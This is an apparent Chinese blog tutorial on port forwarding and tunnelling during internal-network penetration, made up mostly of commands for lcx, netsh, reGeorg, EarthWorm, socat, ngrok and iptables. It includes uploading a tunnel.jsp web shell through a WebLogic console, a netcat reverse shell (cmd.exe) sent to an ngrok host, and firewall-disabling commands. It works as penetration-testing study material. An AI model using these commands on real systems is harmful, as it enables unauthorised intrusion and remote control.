内网渗透----端口转发技术

最新推荐文章于 2024-05-10 23:23:57 发布
最新推荐文章于 2024-05-10 23:23:57 发布
阅读量2.4k 收藏 3
点赞数
分类专栏: # 代理转发 文章标签: 端口转发技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84349850
版权

0x01.htran/lcx

1. 使用htran/lcx进行正向转发

本机执行以下命令,将操作机的8888端口转发至目标机器的7001端口

lcx.exe -tran 8888 192.168.0.136 7001

访问操作机的8888端口
在这里插入图片描述

2. 使用htran/lcx进行反向转发

操作机执行

lcx.exe -listen 8888 5656

需上传lcx至靶机,并执行

lcx.exe -slave 192.168.0.126 8888 127.0.0.1 7001

攻击机访问本机5656端口
在这里插入图片描述

3. Linux版本的lcx
gcc portmap.c -o lcx

在这里插入图片描述

0x02.netsh

netsh firewall show state 查看防火墙状态
# netsh firewall set opmode disable 关闭防火墙
# netsh firewall set opmode enable 启用防火墙
netsh advfirewall firewall add rule name="in" dir=in action=allow protocol=TCP localport=8080
netsh advfirewall firewall add rule name="out" dir=out action=allow protocol=TCP localport=8080

操作机以管理员身份运行运行

netsh interface portproxy set v4tov4 listenaddress=127.0.0.1 listenport=3333 connectaddress=101.198.180.144 connectport=7001

访问3333端口
在这里插入图片描述

查看现有规则

netsh interface portproxy show all

删除转发规则

netsh interface portproxy delete v4tov4 listenport=3333

0x03.使用FPipe进行端口转发**

命令

FPipe.exe -l 5555 -r 7001 101.198.180.144 -v

在这里插入图片描述

0x04.使用reGeorg进行端口转发**

将tunnel.jsp压缩(必须是zip格式),并更改后缀名为war,通过weblogic后台上传至服务器

在这里插入图片描述
本地运行reGeorgSocksProxy.py
在这里插入图片描述

物理机运行反向代理

python reGeorgSocksProxy.py -p 2333 -u http://101.198.180.144:7001/tunnel/tunnel.jsp

在这里插入图片描述
本地使用Proxifier,配置代理服务器
在这里插入图片描述

添加代理规则,将python.exe排除在外
在这里插入图片描述

本地直接访问内网地址
在这里插入图片描述

0x05.使用rtcp进行转发**

Windows上监听端口

nc.exe -nvv -lp 4444

Linux上使用rtcp转发

python rtcp.py l:22 c:101.198.180.135:4444

Windows上已经接收到连接
在这里插入图片描述

在这里插入图片描述

0x06.本地转发

python rtcp.py l:4446 c:192.168.0.68:7001

访问Linux的4446端口
在这里插入图片描述

0x07.ssh+putty转发**

安装putty

apt-get install putty

打开putty,配置SSH
在这里插入图片描述

配置SSH隧道
在这里插入图片描述

连接SSH并登录,保持窗口不关闭
在这里插入图片描述

访问本机的8888端口:
在这里插入图片描述

0x08.ssh+SecureCRT转发**

会话选项中设置:
在这里插入图片描述

连接本地的4444端口:
在这里插入图片描述

0x09.socat转发**

安装socat

apt-get install socat

添加转发规则

socat TCP4-LISTEN:7777,reuseaddr,fork TCP4:192.168.0.92:7001

访问7777端口

在这里插入图片描述

0x10.EarthWorm

在这里插入图片描述

该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。
在这里插入图片描述

正向socks5代理
ew_win32.exe -s  ssocksd -l 9999

在这里插入图片描述

反向socks5代理
相通机器:ew_win32.exe -s rcsocks -l 1080 -e 9999
目标主机:ew_win32.exe -s rssocks -d 1.1.1.1 -e 8888

0x11.ngrok

下载与注册
官网下载:https://ngrok.com/
口令至少10位
本地注册

./ngrok authtoken 5Ed5CTPFzS3**********_**********1E3ubPjGUfM

使用

./ngrok tcp 9999

目标端

nc.exe 0.tcp.ngrok.io 14*** -e C:\Windows\System32\cmd.exe

Linux端

nc -vv -l -p 9999

0x12.iptables

echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 8888 -j DNAT --to-destination 192.168.111.251:3389
iptables -t nat -A POSTROUTING -d 192.168.111.251 -p tcp --dport 3389 -j SNAT --to 192.168.111.41

查看规则:

iptables -L -t nat

在这里插入图片描述

有些系统需要保存与重启,有些系统不需要:

service iptables save
service iptables restart

直接访问192.168.111.41的8888端口

在这里插入图片描述
删除规则:

iptables -D INPUT 3  //删除input的第3条规则  
iptables -t nat -D POSTROUTING 1  //删除nat表中postrouting的第一条规则  
iptables -F INPUT   //清空 filter表INPUT所有规则  
iptables -F    //清空所有规则  
iptables -t nat -F POSTROUTING   //清空nat表POSTROUTING所有规则
浅笑⁹⁹⁶
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
端口转发端口映射
谢公子的博客
11-27 3万+
目录 端口转发端口映射 两者的区别 端口转发端口映射 介绍端口转发端口映射之前先了解两个概念:正向连接和反向连接 正向连接:你的机器连接目标机器 反向连接:目标机器反连你的机器 端口映射:端口映射就是将内网中的主机的一个端口映射到外网主机的一个端口,提供相应的服务。当用户访问外网IP的这个端口时,服务器自动将请求映射到对应局域网内部的机器上。比如,我们在内网中有一台Web服务...
内网渗透中的端口转发技术
wo41ge的博客
12-19 274
目录端口转发Lcx的本地端口转发Lcx的正向端口转发Lcx的反向端口转发Linux中的lcxNetsh前言Netsh的本地端口转发Netsh的正向端口转发ssh前言 端口转发 Lcx的本地端口转发 环境假设 外网服务器拥有双网卡,既可与公网进行通信,也可以与内网服务器进行通信。 内网服务器不可访问公网,但可以与外网服务器的内网IP进行通信 假设我们拿下了外网服务器的账号、密码和命令行权限,想要直接访问外网服务器的3389服务。 但因为防火墙等访问控制策略,不允许公网直接访问3389端口,此时可以
【渗透测试】内网渗透中的端口转发
MachineGunJoe666
07-09 1330
一、内网渗透中的端口转发 需要知道,在渗透的整个流程中,根据web应用或者开放的端口进行渗透,获取webshell只是渗透这门艺术的一小部分,在真实的错综复杂的企业环境中进行内网渗透,其实水很深,涉及内网穿透,端口转发,域渗透,提权等一系列的难题。所以这篇文章对内网渗透学习进行一些记录。在这过程中参考了很多前辈们的宝贵经验,我把这些链接进行了收集,放在参考文献部分。 二、转发,映射,代理 这几个概念其实是比较难区分的,特别是和后面的内网穿透混在一起,在宏观上说,他们差别不大。但是究其本质还是存在不小的差别的
2024年内网渗透工具(1),2024年最新血与泪的总结
最新发布
2401_84247559的博客
05-10 853
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
内网渗透-端口转发与映射
weixin_45427778的博客
08-18 298
内网渗透之——端口转发端口映射 首先在msf生成后门使用exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.115 set lport 12345 端口映射: protfwd --help 通过访问本机的2020端口访问数据服务器的80端口 在攻击主机执行protfwd add -L 192.168.0.115 -l 2020 -p 80 -r 10.10.10.128
端口反向映射、正向转发
xiazhengwei1994的博客
09-18 366
内网机 ssh -NCfR 0.0.0.0:8080:localhost:1521 root@10.30.43.100 将本地端口1521 映射到10.30.43.100 的8080端口 外网机 ssh -fCNL *:10000:localhost:8080 localhost 将 本地的8080 转发到10000
内网渗透端口转发-内网代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公网 IP + 端
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-21
本篇知识分享主要讲解了如何利用SSH隧道进行内网的安全穿越,即内网安全攻防中的端口转发技术。 SSH(Secure Shell)是一种加密的网络协议,用于在不安全的网络上安全地执行远程命令和传输数据。SSH隧道是SSH的一种...
渗透安全面试题库-v3.pdf
08-10
10. **3389端口问题**:可能没开放、端口改了、防火墙拦截或内网访问需端口转发。 11. **注入绕过字符转义**:宽字符注入和HEX编码可以绕过一些过滤机制。 12. **注入漏洞用途**:不只是获取账号密码,还能执行更...
lcx端口转发工具
04-11
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.
内网渗透常见端口转发方式 作者:倾旋.pdf
04-08
内网渗透常见端口转发方式 作者:倾旋
常用的Linux命令和技巧 ,正向反向端口转发(工作中总结)
瞎几波写
11-27 970
1 端口转发 ssh -L{PC端口号}:localhost:{数据库端端口号} root@{服务器IP地址} 工作中遇到如下需求, 服务器1 服务器2 windows开发机 服务器1和服务器2互相之间不能直接访问,但是windows可以访问服务器1和服务器2 如果我们需要从服务器1访问服务器2,我们需要建立端口转发,将windows作为中介,数据流大致是这样的: 服务器1=&gt...
红蓝对抗之隧道技术第一篇(内网穿透、端口映射&端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)
Love&Share
12-19 2532
在进行内网渗透时,由于外网主机无法直接连接内网主机,所以需要使用隧道技术来搭建连接通道访问内网主机即内网穿透,先来了解下几种转发技术
一文了解端口转发
weixin_44255856的博客
08-19 1万+
内网端口转发 应用场景:当你拿到一个网站的shell,然后提权,以及各种的一些操作,当你想开启目标服务器的远程桌面时,然而他却处于内网的服务器中,有什么办法实现呢? 这里就要运用到端口转发了。 端口转发技术,用于允许外部备使用私人电脑服务网络。 对于防火墙禁止访问某些端口的问题,比如3389端口,我们可以将利用机器的3000端口端口转发,从外界接受数据,转发给本机的3389端口,从而绕过防火...
内网渗透笔记-端口转发,内网代理
pyphrb的博客
07-28 9098
0x01 内网代理和转发1.1 正向代理(Forward Proxy)Lhost--》proxy--》Rhost Lhost为了访问到Rhost,向proxy发送了一个请求并且指定目标是Rhost,然后proxy向Rhost转交请求并将获得的内容返回给Lhost,简单来说正向代理就是proxy代替了我们去访问Rhost。1.2 反向代理(reverse proxy)Lhost<--->proxy<-
【VulnHub靶场】——BOREDHACKERBLOG: SOCIAL NETWORK
Demo不是emo的博客
10-29 7107
二十四次系统性打靶第一次,每次打靶后都会分享靶场攻略和总结的知识点,如果对渗透测试和打靶比较感兴趣的小伙伴们也可以跟着我一起训练哦
宝塔离线安装包_阿里云和腾讯云等封杀宝塔面板888端口 宝塔开发商已公布高危漏洞细节...
weixin_39774219的博客
11-20 2261
宝塔面板是个安装次数超过400 万次的服务器控制面板,该面板主要方便运维人员部署服务器环境和进行管理等。日前宝塔面板出现严重级别的高危安全漏洞,攻击者借助该漏洞可以直接访问数据库并删除数据库和入侵服务器。据蓝点网所知目前已经有部分网站遭到黑客和脚本小子攻击,相关数据库遭到黑客和脚本小子删除并进行勒索等。当然在公安部门的介入下已经部分高调的黑客或脚本小子被逮捕,在这里也提醒大家请勿以身试法...
Kali渗透局域网机器
热门推荐
追风筝的孩子
05-12 1万+
一、实验环境: 靶 机:windows10台式机(可以自己搭一个虚拟机,我这里用物理机做靶机):192.168.1.114攻击机:kali虚拟机:192.168.1.116 二、msf工具基本用法: msfconsole #进入msf框架 search 相关漏洞(如search ms17_010) # 使用search命令查找相关漏洞 use exploit...
入侵Tomcat服务器一次实战
dianyimo9099的博客
10-08 774
到网上随便逛逛,我就会发现用JSP制作的电子商务网站多如牛毛,从JSP日渐繁荣的局面来看,适合于各种平台而且免费的Tomcat逐渐成为WEB服务器的一种选择。eBay.com与Dell计算机等知名网站都采用或者曾经采用Tomcat的Container容器执行Servlet 与JSP,可想而知这个服务器软件所具有的前途。那他们的安全性如何呢?一起来看看吧!   小知识:T...
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包中发送给服务器端,服务器端接收到ICMP数据包后解析其中的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内网中传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是网络的一部分,因此可能不会被网络安全设备视为可疑流量。然而,如果攻击者的网络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致网络延迟和丢包等问题,影响传输速度和数据完整性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值